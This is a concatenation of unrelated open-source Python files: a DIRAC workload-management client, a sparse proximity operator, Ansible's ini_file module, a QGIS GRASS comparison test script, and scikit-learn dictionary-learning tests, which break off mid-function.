                      level=logging.INFO)
  options, args = _GetOptionsParser().parse_args()

  path_to_source = {}

  # Roots without prefixes
  for root in options.roots:
    path_to_source.update(_GetRelativePathToSourceDict(root))

  # Roots with prefixes
  for root_and_prefix in options.roots_with_prefix:
    root, prefix = _GetPair(root_and_prefix)
    path_to_source.update(_GetRelativePathToSourceDict(root, prefix=prefix))

  # Source paths
  for path in args:
    path_to_source[path] = source.Source(source.GetFileContents(path))

  # Source paths with alternate deps paths
  for path_with_depspath in options.paths_with_depspath:
    srcpath, depspath = _GetPair(path_with_depspath)
    path_to_source[depspath] = source.Source(source.GetFileContents(srcpath))

  # Make our output pipe.
  if options.output_file:
    out = open(options.output_file, 'w')
  else:
    out = sys.stdout

  out.write(('// This file was autogenerated by %s.\n' %
             os.path.basename(__file__)))
  out.write('// Please do not edit.\n')

  out.write(MakeDepsFile(path_to_source))


if __name__ == '__main__':
  main()
|
fstagni/DIRAC | refs/heads/v7r0-fixes27 | WorkloadManagementSystem/Client/WMSClient.py | 6 | """ DIRAC Workload Management System Client class encapsulates all the
methods necessary to communicate with the Workload Management System
"""
import os
import StringIO
import time
from DIRAC import S_OK, S_ERROR, gLogger
from DIRAC.Core.DISET.RPCClient import RPCClient
from DIRAC.Core.Utilities.ClassAd.ClassAdLight import ClassAd
from DIRAC.Core.Utilities import File
from DIRAC.WorkloadManagementSystem.Client.SandboxStoreClient import SandboxStoreClient
from DIRAC.WorkloadManagementSystem.Utilities.ParametricJob import getParameterVectorLength
from DIRAC.ConfigurationSystem.Client.Helpers.Operations import Operations
from DIRAC.Core.Utilities.DErrno import EWMSJDL, EWMSSUBM
__RCSID__ = "$Id$"
class WMSClient(object):
  """ Class exposing the following jobs methods:

      submit
      kill
      delete
      reschedule
      reset
  """

  def __init__(self, jobManagerClient=None, sbRPCClient=None, sbTransferClient=None,
               useCertificates=False, timeout=600, delegatedDN=None, delegatedGroup=None):
    """ WMS Client constructor

        Here we also initialize the needed clients and connections

        :param jobManagerClient: optional pre-built JobManager RPC client
        :param sbRPCClient: optional sandbox store RPC client (used with sbTransferClient)
        :param sbTransferClient: optional sandbox store transfer client
        :param useCertificates: use host certificates instead of a proxy
        :param timeout: RPC call timeout in seconds
        :param delegatedDN: DN on whose behalf calls are made
        :param delegatedGroup: group on whose behalf calls are made
    """

    self.useCertificates = useCertificates
    self.delegatedDN = delegatedDN
    self.delegatedGroup = delegatedGroup
    self.timeout = timeout

    # The JobManager RPC client is created lazily (see the jobManager property)
    self._jobManager = jobManagerClient
    self.operationsHelper = Operations()

    # The sandbox client is only built here when both of its sub-clients are
    # supplied; otherwise it is built on demand in __uploadInputSandbox
    self.sandboxClient = None
    if sbRPCClient and sbTransferClient:
      self.sandboxClient = SandboxStoreClient(rpcClient=sbRPCClient,
                                              transferClient=sbTransferClient,
                                              useCertificates=useCertificates)

  @property
  def jobManager(self):
    # Lazily instantiate the WorkloadManagement/JobManager RPC client on
    # first access, honouring the delegation settings given at construction
    if not self._jobManager:
      self._jobManager = RPCClient('WorkloadManagement/JobManager',
                                   useCertificates=self.useCertificates,
                                   delegatedDN=self.delegatedDN,
                                   delegatedGroup=self.delegatedGroup,
                                   timeout=self.timeout)
    return self._jobManager

  ###############################################################################

  def __getInputSandboxEntries(self, classAdJob):
    """ Extract the InputSandbox attribute of the JDL as a plain list of strings """
    if classAdJob.lookupAttribute("InputSandbox"):
      inputSandbox = classAdJob.get_expression("InputSandbox")
      # The expression comes back with JDL list decorations, e.g. {"a","b"}:
      # strip braces, quotes and commas to get whitespace-separated entries
      inputSandbox = inputSandbox.replace('","', "\n")
      inputSandbox = inputSandbox.replace('{', "")
      inputSandbox = inputSandbox.replace('}', "")
      inputSandbox = inputSandbox.replace('"', "")
      inputSandbox = inputSandbox.replace(',', "")
      inputSandbox = inputSandbox.split()
    else:
      inputSandbox = []
    return inputSandbox

  def __uploadInputSandbox(self, classAdJob, jobDescriptionObject=None):
    """Checks the validity of the job Input Sandbox.
       The function returns the list of Input Sandbox files.
       The total volume of the input sandbox is evaluated

       :param classAdJob: ClassAd of the job; its InputSandbox attribute is
                          rewritten in place when files are uploaded
       :param jobDescriptionObject: optional StringIO.StringIO (Python 2 API)
                                    holding the job description to upload
       :return: S_OK() or S_ERROR structure
    """
    inputSandbox = self.__getInputSandboxEntries(classAdJob)

    realFiles = []
    badFiles = []
    diskFiles = []

    # Keep only entries that should be real local files: skip LFNs, already
    # stored sandboxes (SB:) and parametric placeholders (%s, %(...)
    for isFile in inputSandbox:
      if not isFile.startswith(('lfn:', 'LFN:', 'SB:', '%s', '%(')):
        realFiles.append(isFile)

    stringIOFiles = []
    stringIOFilesSize = 0
    if jobDescriptionObject is not None:
      if isinstance(jobDescriptionObject, StringIO.StringIO):
        stringIOFiles = [jobDescriptionObject]
        stringIOFilesSize = len(jobDescriptionObject.buf)
        gLogger.debug("Size of the stringIOFiles: " + str(stringIOFilesSize))
      else:
        return S_ERROR(EWMSJDL, "jobDescriptionObject is not a StringIO object")

    # Check real files
    for isFile in realFiles:
      if not os.path.exists(isFile):  # we are passing in real files, we expect them to be on disk
        badFiles.append(isFile)
        gLogger.warn("inputSandbox file/directory " + isFile + " not found. Keep looking for the others")
        continue
      diskFiles.append(isFile)

    diskFilesSize = File.getGlobbedTotalSize(diskFiles)
    gLogger.debug("Size of the diskFiles: " + str(diskFilesSize))
    totalSize = diskFilesSize + stringIOFilesSize
    gLogger.verbose("Total size of the inputSandbox: " + str(totalSize))

    okFiles = stringIOFiles + diskFiles
    if badFiles:
      # Report all missing files at once, together with the computed size
      result = S_ERROR(EWMSJDL, 'Input Sandbox is not valid')
      result['BadFile'] = badFiles
      result['TotalSize'] = totalSize
      return result

    if okFiles:
      if not self.sandboxClient:
        self.sandboxClient = SandboxStoreClient(useCertificates=self.useCertificates,
                                                delegatedDN=self.delegatedDN,
                                                delegatedGroup=self.delegatedGroup)
      result = self.sandboxClient.uploadFilesAsSandbox(okFiles)
      if not result['OK']:
        return result
      # Append the uploaded-sandbox reference and write the (unfiltered)
      # entry list back into the JDL
      inputSandbox.append(result['Value'])
      classAdJob.insertAttributeVectorString("InputSandbox", inputSandbox)

    return S_OK()

  def submitJob(self, jdl, jobDescriptionObject=None):
    """ Submit one job specified by its JDL to WMS.

        The JDL may actually be the desciption of a parametric job,
        resulting in multiple DIRAC jobs submitted to the DIRAC WMS

        :param jdl: path to a JDL file, or the JDL itself as a string
        :param jobDescriptionObject: optional StringIO with the job description
        :return: S_OK with the new job ID(s) or S_ERROR
    """
    if os.path.exists(jdl):
      with open(jdl, "r") as fic:
        jdlString = fic.read()
    else:
      # If file JDL does not exist, assume that the JDL is passed as a string
      jdlString = jdl

    jdlString = jdlString.strip()

    # Strip of comments in the jdl string
    newJdlList = []
    for line in jdlString.split('\n'):
      if not line.strip().startswith('#'):
        newJdlList.append(line)
    jdlString = '\n'.join(newJdlList)

    # Check the validity of the input JDL: wrap in [] if not already wrapped
    if jdlString.find("[") != 0:
      jdlString = "[%s]" % jdlString
    classAdJob = ClassAd(jdlString)
    if not classAdJob.isOK():
      return S_ERROR(EWMSJDL, 'Invalid job JDL')

    # Check the size and the contents of the input sandbox
    result = self.__uploadInputSandbox(classAdJob, jobDescriptionObject)
    if not result['OK']:
      return result

    # Submit the job now and get the new job ID
    result = getParameterVectorLength(classAdJob)
    if not result['OK']:
      return result
    nJobs = result['Value']
    # nJobs > 0 marks a parametric (bulk) job needing transactional handling
    parametricJob = nJobs > 0

    result = self.jobManager.submitJob(classAdJob.asJDL())

    if parametricJob:
      gLogger.debug('Applying transactional job submission')
      # The server applies transactional bulk submission, we should confirm the jobs
      if result['OK']:
        jobIDList = result['Value']
        if len(jobIDList) == nJobs:
          # Confirm the submitted jobs, retrying up to 3 times
          confirmed = False
          for _attempt in xrange(3):
            result = self.jobManager.confirmBulkSubmission(jobIDList)
            if result['OK']:
              confirmed = True
              break
            time.sleep(1)
          if not confirmed:
            # The bulk submission failed, try to delete the created jobs
            resultDelete = self.jobManager.deleteJob(jobIDList)
            error = "Job submission failed to confirm bulk transaction"
            if not resultDelete['OK']:
              error += "; removal of created jobs failed"
            return S_ERROR(EWMSSUBM, error)
        else:
          return S_ERROR(EWMSSUBM, "The number of submitted jobs does not match job description")

    if result.get('requireProxyUpload'):
      # The server flagged that the caller should (re)upload a proxy
      gLogger.warn("Need to upload the proxy")

    return result

  def killJob(self, jobID):
    """ Kill running job.
        jobID can be an integer representing a single DIRAC job ID or a list of IDs
    """
    return self.jobManager.killJob(jobID)

  def deleteJob(self, jobID):
    """ Delete job(s) from the WMS Job database.
        jobID can be an integer representing a single DIRAC job ID or a list of IDs
    """
    return self.jobManager.deleteJob(jobID)

  def rescheduleJob(self, jobID):
    """ Reschedule job(s) in WMS Job database.
        jobID can be an integer representing a single DIRAC job ID or a list of IDs
    """
    return self.jobManager.rescheduleJob(jobID)

  def resetJob(self, jobID):
    """ Reset job(s) in WMS Job database.
        jobID can be an integer representing a single DIRAC job ID or a list of IDs
    """
    return self.jobManager.resetJob(jobID)
|
aasensio/pyiacsun | refs/heads/master | pyiacsun/sparse/proxes_rank1/prox_rank1_l1.py | 2 | __all__ = ["prox_rank1_l1"]
from .prox_rank1_generic import prox_rank1_generic
import numpy as np
def prox_rank1_l1(*args, **kwargs):
    """
    Scaled proximity operator for the l1 norm.

    x = prox_rank1_l1( x0, D, u )

    solves

        x = argmin_{x} ||x||_1 + 1/2 ||x - x0||^2_{V}

    where V^{-1} = D + u*u' (or diag(D) + u*u' if D is a vector).
    "D" must be diagonal and positive; "u" can be any vector.

    Variants:

    x = prox_rank1_l1( x0, D, u, lambda, linTerm, sigma, inverse)

    returns

        x = argmin_{x} ||lambda.*x||_1 + 1/2 ||x - x0||^2_{V} + linTerm'*x

    with either V^{-1} = D + sigma*u*u' when "inverse" is true (default)
    or V = D + sigma*u*u' when "inverse" is false; in both cases "sigma"
    is either +1 (default) or -1, and "lambda" should be non-zero.

    Stephen Becker, Feb 26 2014, stephen.beckr@gmail.com
    Reference: "A quasi-Newton proximal splitting method" by S. Becker and J. Fadili
    NIPS 2012, http://arxiv.org/abs/1206.1156
    Python version: A. Asensio Ramos (March 12, 2015)
    """
    def soft_threshold(x, t):
        # Elementwise soft-thresholding: the proximity operator of ||.||_1
        return np.sign(x) * (np.abs(x) - t).clip(0)

    def break_points(s):
        # Breakpoints of the piecewise-linear prox, at +/- the threshold
        return np.hstack((-s, s))

    return prox_rank1_generic(soft_threshold, break_points, *args, **kwargs)
feinheit/zipfelchappe | refs/heads/master | tests/cod/__init__.py | 4 | # coding: utf-8
from __future__ import absolute_import, unicode_literals |
ashemedai/ansible | refs/heads/devel | lib/ansible/modules/files/ini_file.py | 54 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2012, Jan-Piet Mens <jpmens () gmail.com>
# (c) 2015, Ales Nosek <anosek.nosek () gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ini_file
short_description: Tweak settings in INI files
extends_documentation_fragment: files
description:
- Manage (add, remove, change) individual settings in an INI-style file without having
to manage the file as a whole with, say, M(template) or M(assemble). Adds missing
sections if they don't exist.
- Before version 2.0, comments are discarded when the source file is read, and therefore will not show up in the destination file.
- Since version 2.3, this module adds missing ending newlines to files to keep in line with the POSIX standard, even when
no other modifications need to be applied.
version_added: "0.9"
options:
path:
description:
- Path to the INI-style file; this file is created if required.
- Before 2.3 this option was only usable as I(dest).
required: true
default: null
aliases: ['dest']
section:
description:
- Section name in INI file. This is added if C(state=present) automatically when
a single value is being set.
- If left empty or set to `null`, the I(option) will be placed before the first I(section).
Using `null` is also required if the config format does not support sections.
required: true
default: null
option:
description:
- If set (required for changing a I(value)), this is the name of the option.
- May be omitted if adding/removing a whole I(section).
required: false
default: null
value:
description:
- The string value to be associated with an I(option). May be omitted when removing an I(option).
required: false
default: null
backup:
description:
- Create a backup file including the timestamp information so you can get
the original file back if you somehow clobbered it incorrectly.
required: false
default: "no"
choices: [ "yes", "no" ]
others:
description:
- All arguments accepted by the M(file) module also work here
required: false
state:
description:
- If set to C(absent) the option or section will be removed if present instead of created.
required: false
default: "present"
choices: [ "present", "absent" ]
no_extra_spaces:
description:
- Do not insert spaces before and after '=' symbol
required: false
default: false
version_added: "2.1"
create:
required: false
choices: [ "yes", "no" ]
default: "yes"
description:
- If set to 'no', the module will fail if the file does not already exist.
By default it will create the file if it is missing.
version_added: "2.2"
notes:
- While it is possible to add an I(option) without specifying a I(value), this makes
no sense.
- As of Ansible 2.3, the I(dest) option has been changed to I(path) as default, but
I(dest) still works as well.
author:
- "Jan-Piet Mens (@jpmens)"
- "Ales Nosek (@noseka1)"
'''
EXAMPLES = '''
# Before 2.3, option 'dest' was used instead of 'path'
- name: Ensure "fav=lemonade is in section "[drinks]" in specified file
ini_file:
path: /etc/conf
section: drinks
option: fav
value: lemonade
mode: 0600
backup: yes
- ini_file:
path: /etc/anotherconf
section: drinks
option: temperature
value: cold
backup: yes
'''
import os
import re
# import module snippets
from ansible.module_utils.basic import AnsibleModule
# ==============================================================
# match_opt
def match_opt(option, line):
    """Return a regex match if *line* assigns *option*, whether the line is
    active or commented out with '#' or ';'; otherwise return None."""
    option = re.escape(option)
    for comment_prefix in ('', '#', ';'):
        found = re.match(comment_prefix + ' *%s( |\t)*=' % option, line)
        if found:
            return found
    return None
# ==============================================================
# match_active_opt
def match_active_opt(option, line):
    """Return a regex match only if *line* actively (uncommented) assigns
    *option*; otherwise return None."""
    pattern = ' *%s( |\t)*=' % re.escape(option)
    return re.match(pattern, line)
# ==============================================================
# do_ini
def do_ini(module, filename, section=None, option=None, value=None,
           state='present', backup=False, no_extra_spaces=False, create=True):
    """Apply one add/change/remove operation to an INI-style file.

    :param module: the AnsibleModule instance (check mode, diff mode, backups)
    :param filename: path of the INI file to edit
    :param section: section to operate in; falsy means "before any section"
    :param option: option name, or None to act on the whole section
    :param value: value to assign when state == 'present'
    :param state: 'present' to add/change, 'absent' to remove
    :param backup: make a timestamped backup before writing
    :param no_extra_spaces: write 'k=v' instead of 'k = v'
    :param create: create the file if missing (otherwise fail)
    :returns: (changed, backup_file, diff, msg) tuple
    """

    diff = {'before': '',
            'after': '',
            'before_header': '%s (content)' % filename,
            'after_header': '%s (content)' % filename}

    if not os.path.exists(filename):
        if not create:
            module.fail_json(rc=257, msg='Destination %s does not exist !' % filename)
        # Make sure the parent directory exists before we later write the file
        destpath = os.path.dirname(filename)
        if not os.path.exists(destpath) and not module.check_mode:
            os.makedirs(destpath)
        ini_lines = []
    else:
        ini_file = open(filename, 'r')
        try:
            ini_lines = ini_file.readlines()
        finally:
            ini_file.close()

    if module._diff:
        diff['before'] = ''.join(ini_lines)

    changed = False

    # ini file could be empty
    if not ini_lines:
        ini_lines.append('\n')

    # last line of file may not contain a trailing newline
    if ini_lines[-1] == "" or ini_lines[-1][-1] != '\n':
        ini_lines[-1] += '\n'
        changed = True

    # append a fake section line to simplify the logic
    ini_lines.append('[')

    within_section = not section
    section_start = 0
    msg = 'OK'
    if no_extra_spaces:
        assignment_format = '%s=%s\n'
    else:
        assignment_format = '%s = %s\n'

    for index, line in enumerate(ini_lines):
        if line.startswith('[%s]' % section):
            within_section = True
            section_start = index
        elif line.startswith('['):
            # Start of the next section (or the fake trailing one): the
            # target section, if we were in it, has ended here.
            if within_section:
                if state == 'present':
                    # insert missing option line at the end of the section
                    for i in range(index, 0, -1):
                        # search backwards for previous non-blank or non-comment line
                        if not re.match(r'^[ \t]*([#;].*)?$', ini_lines[i - 1]):
                            ini_lines.insert(i, assignment_format % (option, value))
                            msg = 'option added'
                            changed = True
                            break
                elif state == 'absent' and not option:
                    # remove the entire section
                    del ini_lines[section_start:index]
                    msg = 'section removed'
                    changed = True
            break
        else:
            if within_section and option:
                if state == 'present':
                    # change the existing option line
                    if match_opt(option, line):
                        newline = assignment_format % (option, value)
                        option_changed = ini_lines[index] != newline
                        changed = changed or option_changed
                        if option_changed:
                            msg = 'option changed'
                        ini_lines[index] = newline
                        if option_changed:
                            # remove all possible option occurrences from the rest of the section
                            index = index + 1
                            while index < len(ini_lines):
                                line = ini_lines[index]
                                if line.startswith('['):
                                    break
                                if match_active_opt(option, line):
                                    del ini_lines[index]
                                else:
                                    index = index + 1
                        break
                elif state == 'absent':
                    # delete the existing line
                    if match_active_opt(option, line):
                        del ini_lines[index]
                        changed = True
                        msg = 'option changed'
                        break

    # remove the fake section line
    del ini_lines[-1:]

    # Section was never seen: create it (with the option) at the end of file
    if not within_section and option and state == 'present':
        ini_lines.append('[%s]\n' % section)
        ini_lines.append(assignment_format % (option, value))
        changed = True
        msg = 'section and option added'

    if module._diff:
        diff['after'] = ''.join(ini_lines)

    backup_file = None
    if changed and not module.check_mode:
        if backup:
            backup_file = module.backup_local(filename)
        ini_file = open(filename, 'w')
        try:
            ini_file.writelines(ini_lines)
        finally:
            ini_file.close()

    return (changed, backup_file, diff, msg)
# ==============================================================
# main
def main():
    """Module entry point: parse arguments, apply the INI change, exit."""

    module = AnsibleModule(
        argument_spec=dict(
            path=dict(required=True, aliases=['dest'], type='path'),
            section=dict(required=True),
            option=dict(required=False),
            value=dict(required=False),
            backup=dict(default='no', type='bool'),
            state=dict(default='present', choices=['present', 'absent']),
            no_extra_spaces=dict(required=False, default=False, type='bool'),
            create=dict(default=True, type='bool')
        ),
        add_file_common_args=True,
        supports_check_mode=True
    )

    params = module.params

    (changed, backup_file, diff, msg) = do_ini(
        module, params['path'], params['section'], params['option'],
        params['value'], params['state'], params['backup'],
        params['no_extra_spaces'], params['create'])

    # Honour the common file attributes (owner, mode, ...) on the result
    if not module.check_mode and os.path.exists(params['path']):
        file_args = module.load_file_common_arguments(module.params)
        changed = module.set_fs_attributes_if_different(file_args, changed)

    results = dict(changed=changed, msg=msg, path=params['path'], diff=diff)
    if backup_file is not None:
        results['backup_file'] = backup_file

    # Mission complete
    module.exit_json(**results)
# Invoke the module entry point when executed by the Ansible runner.
if __name__ == '__main__':
    main()
|
gioman/QGIS | refs/heads/master | src/plugins/grass/qgis_grass_test.py | 7 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# -----------------------------------------------------------
#
# Copyright (C) 2012 Radim Blazek
# EMAIL: radim.blazek (at) gmail.com
#
# -----------------------------------------------------------
#
# licensed under the terms of GNU GPL 2
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# ---------------------------------------------------------------------
"""
***************************************************************************
GRASS Direct test - to be run in GRASS shell
- collects list of raster layers
- exports GRASS layers on low resolution to temporary GeoTIFFs
- runs GRASS modules in standard and direct mode and compares results
- writes out report
***************************************************************************
"""
__author__ = 'Radim Blazek'
__date__ = 'December 2012'
__copyright__ = '(C) 2012, Radim Blazek'
__revision__ = '$Format:%H$'
import os
import sys
import subprocess
import time
import re
class Test:
    """Compare GRASS modules run natively and in QGIS "direct" mode.

    Must be executed inside a GRASS shell (GISBASE/GISRC set) with
    QGIS_PREFIX_PATH pointing at the QGIS installation.  Failures are
    accumulated via report() and printed by writeReport().
    """

    def __init__(self):
        # Refuse to run outside a GRASS shell: all the g.*/r.* commands
        # below rely on the GRASS environment being set up.
        if "GISBASE" not in os.environ or "GISRC" not in os.environ:
            print("This script must be run in GRASS shell.")
            sys.exit(1)

        if "QGIS_PREFIX_PATH" not in os.environ:
            print("QGIS_PREFIX_PATH environment variable not set.")
            sys.exit(1)

        # Region size (cols/rows) used for the low-resolution export
        self.size = 10
        self.reportStr = ""

    # add message to HTML report
    def report(self, msg):
        self.reportStr += msg + "\n"

    def writeReport(self):
        """Print the accumulated report to stdout."""
        print(self.reportStr)

    def test(self):
        """Export rasters, run each module natively and in direct mode, and
        record any failures in the report."""
        print("GRASS Direct test")

        tmp_dir = os.path.abspath("qgis-grass-test-%s" % time.strftime('%y%m%d-%H%M%S'))
        tmp_dir = os.path.abspath("qgis-grass-test-debug")  # debug
        print("Output will be written to %s" % tmp_dir)

        files_dir = "%s/tif" % tmp_dir
        # os.makedirs( files_dir )

        # get list of raster layers
        print("Getting list of rasters ...")
        rasters = self.srun(["g.mlist", "type=rast"]).splitlines()
        max_rasters = 1
        print("%s rasters found, using first %s" % (len(rasters), max_rasters))
        # Fixed: honour max_rasters instead of a hard-coded [0:1] slice so the
        # message above stays truthful when max_rasters is changed.
        rasters = rasters[:max_rasters]

        print("Exporting rasters")
        for raster in rasters:
            print(raster)
            output = "%s/%s.tif" % (files_dir, raster)
            self.srun(["g.region", "rast=%s" % raster, "cols=%s" % self.size, "rows=%s" % self.size])
            self.srun(["r.out.gdal", "input=%s" % raster, "output=%s" % output])

        # run modules
        for module in self.modules():
            for raster in rasters:
                # Collapse repeated spaces so split(" ") yields clean args
                module = re.sub(" *", " ", module)
                module_name = module.split(" ")[0]

                # --- native ---
                self.srun(["g.region", "rast=%s" % raster, "cols=%s" % self.size, "rows=%s" % self.size])
                output = "qgistest1"
                # clean old
                self.srun(["g.remove", "-f", "rast=%s" % output])
                # substitute rasters
                native_args = module.replace("R1", raster).replace("RO1", output).split(" ")
                (code, out, err) = self.run(native_args)
                if code != 0:
                    self.report("Native failed: %s" % " ".join(native_args))
                # export
                native_output_file = "%s/%s-%s-native.tif" % (files_dir, module_name, raster)
                self.srun(["r.out.gdal", "input=%s" % output, "output=%s" % native_output_file])
                self.srun(["g.remove", "-f", "rast=%s" % output])

                # --- direct ---
                direct_input_file = "%s/%s.tif" % (files_dir, raster)
                direct_output_file = "%s/%s-%s-direct.tif" % (files_dir, module_name, raster)
                # substitute rasters
                direct_args = module.replace("R1", direct_input_file).replace("RO1", direct_output_file).split(" ")

                env = os.environ
                # CRS: pass the current projection to QGIS via environment
                proj = self.srun(["g.proj", "-j"])
                longlat = True if proj.find("+proj=longlat") != -1 else False
                proj = proj.splitlines()
                proj = " ".join(proj)
                print(proj)
                env['QGIS_GRASS_CRS'] = proj

                # set GRASS region as environment variable
                reg = self.srun(["g.region", "-g"])
                reg_dict = dict(item.split("=") for item in reg.splitlines())
                reg_var = {'n': 'north', 's': 'south', 'e': 'east', 'w': 'west', 'nsres': 'n-s resol', 'ewres': 'e-w resol'}
                if longlat:
                    region = "proj:3;zone:-1"  # longlat
                else:
                    region = "proj:99;zone:-1"  # other projection
                # Fixed: iteritems() is Python 2 only; items() works on both
                # Python 2 and Python 3 and matches the py3-style print() used
                # throughout this file.
                for k, v in reg_dict.items():
                    if k == 'cells':
                        continue
                    kn = k
                    if k in reg_var:
                        kn = reg_var[k]
                    region += ";%s:%s" % (kn, v)
                print(region)
                env['GRASS_REGION'] = region

                # add path to fake GRASS gis library
                env['LD_LIBRARY_PATH'] = "%s/lib/qgis/plugins/:%s" % (env['QGIS_PREFIX_PATH'], env['LD_LIBRARY_PATH'])
                (code, out, err) = self.run(direct_args, env)
                print("code = %s" % code)
                if code != 0:
                    self.report("Direct failed: %s\n%s\n%s" % (" ".join(direct_args), out, err))
                # TODO: compare native x direct output

    def run(self, args, env=None, input=None, exit_on_error=False):
        """Run a command and return (returncode, stdout, stderr).

        NOTE(review): 'input' shadows the builtin but is part of the public
        signature, so it is kept.  Under Python 3 the returned streams are
        bytes while callers treat them as str — confirm the intended
        interpreter.
        """
        cmd = " ".join(args)
        print(cmd)
        p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, env=env)
        com = p.communicate(input)
        p.wait()  # communicate() already waited; kept as a harmless no-op
        if p.returncode != 0 and exit_on_error:
            msg = "Failed:\n" + str(com[0]) + "\n" + str(com[1])
            raise Exception(msg)
        return (p.returncode, com[0], com[1])  # return stdout

    # simple run
    def srun(self, args):
        """Run a command, raising on any non-zero exit; return stdout."""
        return self.run(args, None, None, True)[1]

    def modules(self):
        """Return the list of module command templates to test.

        R1  - input raster 1
        RO1 - output raster 1
        """
        modules = [
            "r.slope.aspect elevation=R1 aspect=RO1"
        ]
        return modules
# Run the full native-vs-direct comparison when executed as a script.
if __name__ == '__main__':
    test = Test()
    test.test()
    test.writeReport()
|
RachitKansal/scikit-learn | refs/heads/master | sklearn/decomposition/tests/test_dict_learning.py | 69 | import numpy as np
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_true
from sklearn.utils.testing import assert_less
from sklearn.utils.testing import assert_raises
from sklearn.utils.testing import ignore_warnings
from sklearn.utils.testing import TempMemmap
from sklearn.decomposition import DictionaryLearning
from sklearn.decomposition import MiniBatchDictionaryLearning
from sklearn.decomposition import SparseCoder
from sklearn.decomposition import dict_learning_online
from sklearn.decomposition import sparse_encode
# Deterministic module-level fixture shared by all tests below:
# a small random design matrix with 10 samples of 8 features.
rng_global = np.random.RandomState(0)
n_samples, n_features = 10, 8
X = rng_global.randn(n_samples, n_features)
def test_dict_learning_shapes():
    # The fitted dictionary must expose one atom per requested component.
    n_components = 5
    dico = DictionaryLearning(n_components, random_state=0).fit(X)
    assert_true(dico.components_.shape == (n_components, n_features))


def test_dict_learning_overcomplete():
    # Also holds when n_components > n_features (overcomplete dictionary).
    n_components = 12
    dico = DictionaryLearning(n_components, random_state=0).fit(X)
    assert_true(dico.components_.shape == (n_components, n_features))


def test_dict_learning_reconstruction():
    # code @ dictionary should reconstruct X for omp and lasso_lars codes.
    n_components = 12
    dico = DictionaryLearning(n_components, transform_algorithm='omp',
                              transform_alpha=0.001, random_state=0)
    code = dico.fit(X).transform(X)
    assert_array_almost_equal(np.dot(code, dico.components_), X)

    dico.set_params(transform_algorithm='lasso_lars')
    code = dico.transform(X)
    assert_array_almost_equal(np.dot(code, dico.components_), X, decimal=2)

    # used to test lars here too, but there's no guarantee the number of
    # nonzero atoms is right.


def test_dict_learning_reconstruction_parallel():
    # regression test that parallel reconstruction works with n_jobs=-1
    n_components = 12
    dico = DictionaryLearning(n_components, transform_algorithm='omp',
                              transform_alpha=0.001, random_state=0, n_jobs=-1)
    code = dico.fit(X).transform(X)
    assert_array_almost_equal(np.dot(code, dico.components_), X)

    dico.set_params(transform_algorithm='lasso_lars')
    code = dico.transform(X)
    assert_array_almost_equal(np.dot(code, dico.components_), X, decimal=2)
def test_dict_learning_lassocd_readonly_data():
    # lasso_cd must cope with read-only (memmapped) input data.
    n_components = 12
    with TempMemmap(X) as X_read_only:
        dico = DictionaryLearning(n_components, transform_algorithm='lasso_cd',
                                  transform_alpha=0.001, random_state=0, n_jobs=-1)
        code = dico.fit(X_read_only).transform(X_read_only)
        assert_array_almost_equal(np.dot(code, dico.components_), X_read_only, decimal=2)


def test_dict_learning_nonzero_coefs():
    # transform_n_nonzero_coefs must bound the sparsity of the code exactly.
    n_components = 4
    dico = DictionaryLearning(n_components, transform_algorithm='lars',
                              transform_n_nonzero_coefs=3, random_state=0)
    code = dico.fit(X).transform(X[np.newaxis, 1])
    assert_true(len(np.flatnonzero(code)) == 3)

    dico.set_params(transform_algorithm='omp')
    code = dico.transform(X[np.newaxis, 1])
    assert_equal(len(np.flatnonzero(code)), 3)


def test_dict_learning_unknown_fit_algorithm():
    # An invalid fit_algorithm must raise ValueError at fit time.
    n_components = 5
    dico = DictionaryLearning(n_components, fit_algorithm='<unknown>')
    assert_raises(ValueError, dico.fit, X)


def test_dict_learning_split():
    # split_sign=True doubles the code width into positive/negative halves
    # whose difference reproduces the unsplit code.
    n_components = 5
    dico = DictionaryLearning(n_components, transform_algorithm='threshold',
                              random_state=0)
    code = dico.fit(X).transform(X)
    dico.split_sign = True
    split_code = dico.transform(X)

    assert_array_equal(split_code[:, :n_components] -
                       split_code[:, n_components:], code)
def test_dict_learning_online_shapes():
    # The functional API must return a code/dictionary pair of matching shapes.
    rng = np.random.RandomState(0)
    n_components = 8
    code, dictionary = dict_learning_online(X, n_components=n_components,
                                            alpha=1, random_state=rng)
    assert_equal(code.shape, (n_samples, n_components))
    assert_equal(dictionary.shape, (n_components, n_features))
    assert_equal(np.dot(code, dictionary).shape, X.shape)


def test_dict_learning_online_verbosity():
    n_components = 5
    # test verbosity
    from sklearn.externals.six.moves import cStringIO as StringIO
    import sys

    old_stdout = sys.stdout
    try:
        # Capture stdout so the verbose output does not pollute test logs.
        sys.stdout = StringIO()
        dico = MiniBatchDictionaryLearning(n_components, n_iter=20, verbose=1,
                                           random_state=0)
        dico.fit(X)
        dico = MiniBatchDictionaryLearning(n_components, n_iter=20, verbose=2,
                                           random_state=0)
        dico.fit(X)
        dict_learning_online(X, n_components=n_components, alpha=1, verbose=1,
                             random_state=0)
        dict_learning_online(X, n_components=n_components, alpha=1, verbose=2,
                             random_state=0)
    finally:
        sys.stdout = old_stdout

    assert_true(dico.components_.shape == (n_components, n_features))


def test_dict_learning_online_estimator_shapes():
    n_components = 5
